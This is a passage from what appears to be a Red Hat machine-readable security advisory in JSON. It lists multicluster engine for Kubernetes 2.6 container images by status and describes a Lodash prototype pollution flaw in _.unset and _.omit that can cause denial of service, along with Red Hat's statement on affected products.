2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:e05c6ff6a481e7956a58e07f10dc15470ef2af82966b2159260077bd6ba06cf7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:4bef3dab9db981249b3a1b3a556e615226b29fdc7a6593a3970921799817129f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:901dd1ad148b84d3c1bcfa71beeaf75b836bb382bf99893f65d4629d006bcfc7_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:abdca0cc6776dba16be873853e38bc62bb9d3f1eb80f1d4bcbe7829714a019b5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:f856447bc82e37dc4da78639ff08bc1f4b4c4e0d75c3d1eeec81e3807c65ad7e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:345d589cb55ccb8afb080f04054ebc30f0cf6383742ce750f4f5656e14f4db35_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5557594c1ac0b047fea659868fdf71b8f16e0548abe8f41bf58ce80924701a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:8e08974a6dc10be9cb7d7a07527e8960cd93b76506355ce900e2e691208d1047_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:9d501eb84c2b7f9f860c5bb08d9adcc599e42ed0c3a0e24af3c32b686f005182_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:8690fcbd38eeec0cde0edc5c2e46683837d6247ce657c495fc791a0bb13c0450_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b41036dc59ecfd530609349da9b73dec177184662aaf69bac35e67d245815d2a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b5a7706fc69c7e1b3ad3ff03c5b0e46b44cd93ce332a74acd43da8c86b6b7163_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f0f363dc51f50bf822bff6b5f9072299c2404d8df1891243ae3ad6ba90c95f0a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:212c9c73fd1050e3f202703e7c5c5a466d1931d918e3f730d2c56bb2629337e2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:c6b10fd7009685d032e8c914cce4a1b2630ab99f2262fddd6dd32c048224e535_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d26e9fe1bf09eb1c025e28c795debabe0dda6a3f0fa112a6507b8862489de361_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:e246eb1fb572fe7ad7058afd783020e77dd61699a5ffd290000e80baa6bc0454_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:c3754441d1af76c226983b48c57b537856da6cc21272008c05dfbb8e860d25f6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:deacb2138fe3d8a8d9ddebbbc257b4ea5be376c26df0e46a276c631752ca8a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:e7f321893f0f76fcf0e83225502e1367752c24c449a44810ccbed08ee3af3efb_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:f33966f40e46d3815d0a8859b4fa802e48931ba8f95957c31c9d728f6ae42340_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4b4a1fda57434c75499094003457759ec6d530ec8fcfc08c8e0c86fb6f33c68f_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:93eb3a376b3d3a878d104d8af966b8deaed7b26ceaf16bf337d70687e0e5fa17_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:c7f96198522ecf44c19fe190d603d94387b3a522e3210826c6c08c0999aabc56_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:da99e0676f28200a08e4996adb0d107713fd11f747df5abb8b58fbc95bcab827_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:43f0b3b75610ab9d19d261854e390dc01bf64777cce43a1076375b1580452908_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:583bf219ded8c4f21a696daa081720f3eb81c3676e0182fd246e6d4f1d3fb2f7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:76a5e7db276463588b6a98c27fb8a24a8f85b73eef2fd4742b72690fa92decc3_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8efc263d78912f66ee98a3717a8cefdeb6e6b87bd8f3788d4f3712d9000d031c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:27bb82aa0a0d0506fa45908892e379e4bf8190ee9512483c7d7b6a001eb37c09_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4e8e3b7a8a317dda2ec47a53110467177015d9cec39ee64b819a133048ee06f2_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9df56b21394d9b17bf70d49a367c004c4f76111bbcd0ae2046871631a914a5a4_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:ecc19a7bbdce3c0328fff1da64ae4f3959c9d0a67400cea11744bc5d336853ee_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:1f68b9c88d343654c87334fbc3b5c42338406b727da3c6bbf3b14fbef236b93a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:2eb31f9a7694f4b8690e168c0d8fcd0da42642ca87508e5199e4310fc56ea232_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:a1a514fcf09eda92d948a4375a599fcd45189a36a8748a2cf499a0fd12a7cb52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:edc942a663b791725f358fcef40fe2de8ad55f8f81d7ac2ff239ccefbb24ea3c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:221cce833cfe679a7ed2674f39ed6aae065939119702188811507cf7b672996c_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:bcb17131e9d74ac42ddcb1baf13c2697a72c07dd386b871032c34144be5d9647_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d55c640d3df3705e8a861e7034f450d1c7bb5726251ba0384fd28b40bb178595_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:e006a8a7d0dc166885ba2a5f573128938ee6d56c882a71b68845b97e483d6e32_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5c4384e6f2589dedfbb0942b40187a93581b07a724ec2a84189af4f617e9416b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5f68fd93ae28391c01fe0a44829f12494544b59c330a2902a6edaad45c7b02b3_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b6f4af9508e1a5a312c274aa19fa280970d462e16857394d843c53358ee318c2_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b9d178326c5f78df593cad595dd3b8a1329187d9f8d021201df726206b70bc49_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:2d23f9d25ffe94fbb9e794a61690cf08ac2888b053efc194c9abdcdeaea8fee5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:3fbf4c46f032eb961dc7f519f38cd93e49839ac94761e6f43de0e648d75c241a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:4196cd9623f2102f364c0662c6c6092efb19b2dba7bb60d0b156a12dccef9949_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:aaade5f90a49e8b49ccb8cc1fd74485ba78a37cab222676e2495500e95a911e6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:07eaddc3666472876e1470d7d5bc49f28bce4176efbed07214d1284a785bc1de_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:0afadb8cc20a5a4a55a9762159ccd08de9c79abd5cd915f620eaedcae97e1dda_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:79cb2e32b2711d9986e53977c8757b2564ae3dc2cb82076adae43aeb61bc1499_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:bb24ce270fa3812316ec61cc7b5bf138ed54608e326d5ee783e040ca04b30c6e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:df9600893f99f149e15fb4a0295ed978d0cc35141a67a3a9824d339a5e13e08f_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:ed9963c1c0f2535aa753ecf341ab45890c838c49719b189fa1149ce5a36f244c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:f88156d91c826636ffbff092da3733a06f49f210d3f45c20b3d145b8033d3a14_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:fb23549a45050af95855906f65732389237ed6e907974600ee5f02fda696c7a7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:08236bbe9754e0d9e8e11c1486fe81134ed8cb392f8157a9267e22823662fe83_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:3ef0376735304b9a8d46648aacc84adffbe3424d2ad790cbfd3a10888d60b54d_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:6ae974b35acc19fad0a42f0452bdb13d4d736ed59e3c9ce1ff448456f8f8cf3b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:cd44c903b5ce3fc9f9c93be883f2a5c6106d1d86ad5a3596f8cb1ccb8ddc316c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:48408e0a5ec56b32fb9cfddf696c91b3fa1890679643959f3b12ddf746ddfe40_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6ebdb26020f475f5a9066777ea8aeb0bc6a99f93db9a7e6d1e0a6272528ce8e7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:c67a2dc59ec90f77f8de8e72d4130f181e0ced37aba0a2b71d438e9221fd53fe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:f076915d0170bd2a3ae4552c9a2199dcab7016f0fe4f9e6d027a474a81dffa44_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:08b253bbac766546380de11c4eb330ab1da4cf45bace66296d6ce71a46052ccc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:3ed63b7040f9f2e43f3034c0b1ecd3479b6fb1e9cb45f34b65c6ba2cc0fdc6e1_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:491acfe31e1ded0bd8b5e6d4ce5115a5e1ef4b0ea5165635abcb21055a3c9f41_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:e32f3082cbed11fd6e5f1f65b58d9e2ab52df3298ecc63ce32dea78fdf36150e_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:071caf0cee1f904aaf5747b5c894f8e68e273c76b045e2e46f3fdc747fde0b52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:222fb4df168138dfe036cba15b0592b8d85aeb0a3907cbbcb80caa148ebd5e75_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:76e5532fdd70e237898a03f7ab0304d44684ac4d78930c04140558b780e44284_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:a7d81f1ca5781bad0fdf032192994d7aebb438b67370526b7aaf24de26ea2a4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:0389924d0daecd14270a2c80cf761400b2683b5d1f191ac63e09eddc33b6f459_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:54ec16d78dafc319cdd51ef6c7328ec9b6ad7fdf9cac5e4e47c1f510ad2a132a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:8c81477e75d355483f39b88ddfdd30b8ea6982a45aeb3cdc178b53f6e9198334_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:969cc2b05bb0fe1b00cfa728b6b0a741bf21e81aecae04aba1e0bbdd1921faa5_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:55abc89b8554cc3e314cf9f7f998101a931c3cf9b3b21e0f0cdbe26d5aba1be6_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:855c5cd1036f4a3c38f35f6d781e3f31941c91d61b699f4b714cda909b81bf70_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cb3f786b682cc31995858194dec9dfdc1ac43f6a0ceb609364bbc07c732895e9_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cc8fc81d0fb612703581e0df2f9b4262aae0d1f1af29a5facdf9dac567b95510_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2b24bab2c9db586e3de204607f606c1577ab35ef78ce9cb154b08d56a3cb70d3_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:65ee7dbee80ad40347972f9a42cb18cde25554211afbb6f0e2c1aca3405e11f2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9ce62c421421c1c2739b1e79f010539134123583ebaef7274549ba49e1c0010a_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9e7310305572d3bcbfca6bff55daa43a01039cc6384149b573c696335048e5a5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3764ca1ef9ed913896c0449b271706748517cf96e67d88ad491e225fcb0eb549_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:cd74d39b219e499f077516f6c229cddff21cd480d4ef33033d644bdbfb0b3682_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d1b6093f101ae7e4956aad52d4de99c68472f86de3094c98fc4f290926a99f4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:e84d9e60025112bcc466c1ab0c8b82dccafc34b85266f5650ff6c4fbdd9ad6c5_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:068f2fd00a2709d041c1eb2aab64ac4741a7a4b27475a722571a450ab496b655_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2c8f4c88f1ac9cd64359e990530e27ad8c3ff590e17aca5a072ef0ec674f380d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:817d332d90af406985a0611de4a171f7478d39f0afa1a6aafb7cf5eb7616ca78_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:b6b5e9e343849e851770dcdbf287b63de1a0cb8cec21cee9be2ef4fdcca445e3_amd64"]}], "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2431740"}], "notes": [{"category": "description", "text": "A flaw was found in Lodash. A prototype pollution vulnerability in the _.unset and _.omit functions allows an attacker able to control property paths to delete methods from global prototypes. By removing essential functionalities, this can result in a denial of service.", "title": "Vulnerability description"}, {"category": "summary", "text": "lodash: prototype pollution in _.unset and _.omit functions", "title": "Vulnerability summary"}, {"category": "other", "text": "This issue is only exploitable by applications using the _.unset and _.omit functions on an object and allowing user input to determine the path of the property to be removed. This issue only allows the deletion of properties but does not allow overwriting their behavior, limiting the impact to a denial of service. Due to this reason, this vulnerability has been rated with an important severity.\n\nIn Grafana, JavaScript code runs only in the browser, while the server side is all Golang. Therefore, the worst-case scenario is a loss of functionality in the client application inside the browser. To reflect this, the CVSS availability metric and the severity of the Grafana and the Grafana-PCP component have been updated to low and moderate, respectively.\n\nThe lodash dependency is bundled and used by the pcs-web-ui component of the PCS package. In Red Hat Enterprise Linux 8.10, the pcs-web-ui component is no longer included in the PCS package. As a result, RHEL 8.10 does not ship the vulnerable lodash component within PCS and is therefore not-affected by this CVE.", "title": "Statement"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:32a81668f5cac70ec36ffc3caa97a4239d1840004afc8df2418e79bbbbf7c88d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:394ac878a493ffd61692942614165e69acbdaaa37b1f9a460996dc52d8586b82_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:ba480c9b472e0746645bcebdd6ed5559b611d410d521637a9e7092ee925af91d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d564b6f6d156280a08c0f3585673a11c4a72acc74626b5780bb39b7141170a19_s390x"], "known_not_affected": ["multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:407afc190324598e778fc09d218da552a2430612bad6b50ff9f6bc824b788dfc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:437c27590382282a29dd543a69bbaed7ebd5421f73b98311c13f9e37c9ff553e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:865fcb2f6796be98004ad84f0fffcd7200690f56ccccf5a39af4c5888abb213e_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f82ac0d043682cc16fb832d9027464ee65f314d70ce98687f45db50e16d2b250_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:0768996d28693025a487c86c72debf1fda095282412b2c33ca0f21d8d9011b8a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5e84dda66a7735bbae425ac1a6b0e241662edb858476eb82adf72b7dff4b3916_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:9f13c6203d4ba9cde9bd8932b7e86c4a9c3396bb82235601b84f6743fb1b675f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:ed05bbaa85197e21425ed8f503f74c6717bb6f2112e9b57c9b115071777c1995_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:2ec4baacabb144497ea62482a3c0ccafb9c3794c5c89f9aebbe855d7d9829dbe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:72e64e8d1be38857af7beadc81e2f5f071f636b1d9233a70add5a1f18833ec45_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c17a0ffd9c9546016a87cdd75adbaaa742f8637a0d81975d7b76662ffe5b069d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:e05c6ff6a481e7956a58e07f10dc15470ef2af82966b2159260077bd6ba06cf7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:4bef3dab9db981249b3a1b3a556e615226b29fdc7a6593a3970921799817129f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:901dd1ad148b84d3c1bcfa71beeaf75b836bb382bf99893f65d4629d006bcfc7_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:abdca0cc6776dba16be873853e38bc62bb9d3f1eb80f1d4bcbe7829714a019b5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:f856447bc82e37dc4da78639ff08bc1f4b4c4e0d75c3d1eeec81e3807c65ad7e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:345d589cb55ccb8afb080f04054ebc30f0cf6383742ce750f4f5656e14f4db35_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5557594c1ac0b047fea659868fdf71b8f16e0548abe8f41bf58ce80924701a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:8e08974a6dc10be9cb7d7a07527e8960cd93b76506355ce900e2e691208d1047_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:9d501eb84c2b7f9f860c5bb08d9adcc599e42ed0c3a0e24af3c32b686f005182_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:8690fcbd38eeec0cde0edc5c2e46683837d6247ce657c495fc791a0bb13c0450_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b41036dc59ecfd530609349da9b73dec177184662aaf69bac35e67d245815d2a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b5a7706fc69c7e1b3ad3ff03c5b0e46b44cd93ce332a74acd43da8c86b6b7163_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f0f363dc51f50bf822bff6b5f9072299c2404d8df1891243ae3ad6ba90c95f0a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:212c9c73fd1050e3f202703e7c5c5a466d1931d918e3f730d2c56bb2629337e2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:c6b10fd7009685d032e8c914cce4a1b2630ab99f2262fddd6dd32c048224e535_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d26e9fe1bf09eb1c025e28c795debabe0dda6a3f0fa112a6507b8862489de361_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:e246eb1fb572fe7ad7058afd783020e77dd61699a5ffd290000e80baa6bc0454_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:c3754441d1af76c226983b48c57b537856da6cc21272008c05dfbb8e860d25f6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:deacb2138fe3d8a8d9ddebbbc257b4ea5be376c26df0e46a276c631752ca8a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:e7f321893f0f76fcf0e83225502e1367752c24c449a44810ccbed08ee3af3efb_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:f33966f40e46d3815d0a8859b4fa802e48931ba8f95957c31c9d728f6ae42340_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4b4a1fda57434c75499094003457759ec6d530ec8fcfc08c8e0c86fb6f33c68f_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:93eb3a376b3d3a878d104d8af966b8deaed7b26ceaf16bf337d70687e0e5fa17_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:c7f96198522ecf44c19fe190d603d94387b3a522e3210826c6c08c0999aabc56_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:da99e0676f28200a08e4996adb0d107713fd11f747df5abb8b58fbc95bcab827_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:43f0b3b75610ab9d19d261854e390dc01bf64777cce43a1076375b1580452908_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:583bf219ded8c4f21a696daa081720f3eb81c3676e0182fd246e6d4f1d3fb2f7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:76a5e7db276463588b6a98c27fb8a24a8f85b73eef2fd4742b72690fa92decc3_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8efc263d78912f66ee98a3717a8cefdeb6e6b87bd8f3788d4f3712d9000d031c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:27bb82aa0a0d0506fa45908892e379e4bf8190ee9512483c7d7b6a001eb37c09_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4e8e3b7a8a317dda2ec47a53110467177015d9cec39ee64b819a133048ee06f2_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9df56b21394d9b17bf70d49a367c004c4f76111bbcd0ae2046871631a914a5a4_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:ecc19a7bbdce3c0328fff1da64ae4f3959c9d0a67400cea11744bc5d336853ee_arm64", "multicluster engine for Kubernetes 